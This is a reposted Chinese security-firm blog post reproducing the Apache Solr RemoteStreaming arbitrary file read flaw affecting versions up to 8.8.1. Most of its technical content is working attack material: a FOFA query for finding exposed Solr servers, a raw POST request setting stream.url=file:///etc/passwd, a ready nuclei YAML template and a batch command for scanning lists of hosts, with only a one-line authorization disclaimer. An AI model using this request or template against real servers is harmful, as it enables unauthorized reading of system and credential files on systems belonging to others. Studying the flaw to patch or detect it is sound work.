漏洞复现 Apache Solr RemoteStreaming 任意文件读取

admin 2022年6月4日12:35:00评论213 views字数 1510阅读5分2秒阅读模式

0x01 漏洞描述

   ApacheSolr是一个功能强大的开源搜索服务器,它支持REST风格API。在ApacheSolr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成任意文件读取。

漏洞复现 Apache Solr RemoteStreaming 任意文件读取

0x02 漏洞复现

漏洞影响: Apache Solr <= 8.8.1

FOFA:app="APACHE-Solr"

1.抓包并修改payload,即可任意读取/etc/passwd

POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1Host: x.x.x.x:8983User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0Content-Type: application/x-www-form-urlencodedContent-Length: 29
stream.url=file:///etc/passwd

漏洞复现 Apache Solr RemoteStreaming 任意文件读取


2.nuclei漏洞脚本如下(nuclei稳定快,编写poc简单,有社区维护,推荐使用)

nuclei下载地址:https://github.com/projectdiscovery/nuclei

批量验证命令:nuclei.exe -l subs.txt -t solr-ContentStreams.yaml
yaml POC:id: solr-ContentStreams
info: name: solr-ContentStreams-Fileread author: sm severity: high description: | solr-ContentStreams-Fileread reference: - https://blog.csdn.net/sycamorelg/article/details/120706240 tags: Apache Solr
requests: - raw: - | POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Content-Type: application/x-www-form-urlencoded Content-Length: 29
stream.url=file:///etc/passwd
matchers-condition: and matchers: - type: word words: - "root" - "solr:x" condition: and
- type: status status: - 200

漏洞复现 Apache Solr RemoteStreaming 任意文件读取

(注:要在正规授权情况下测试网站:日站不规范,亲人泪两行)


0x03 公司简介

江西渝融云安全科技有限公司,2017年发展至今,已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司,是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证,拥有软件著作权十八项;荣获2020年全国工控安全深度行安全攻防对抗赛三等奖;庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制:sm

审核:fjh

审核:Dog


原文始发于微信公众号(融云攻防实验室):漏洞复现 Apache Solr RemoteStreaming 任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月4日12:35:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 Apache Solr RemoteStreaming 任意文件读取https://cn-sec.com/archives/1085294.html

发表评论

匿名网友 填写信息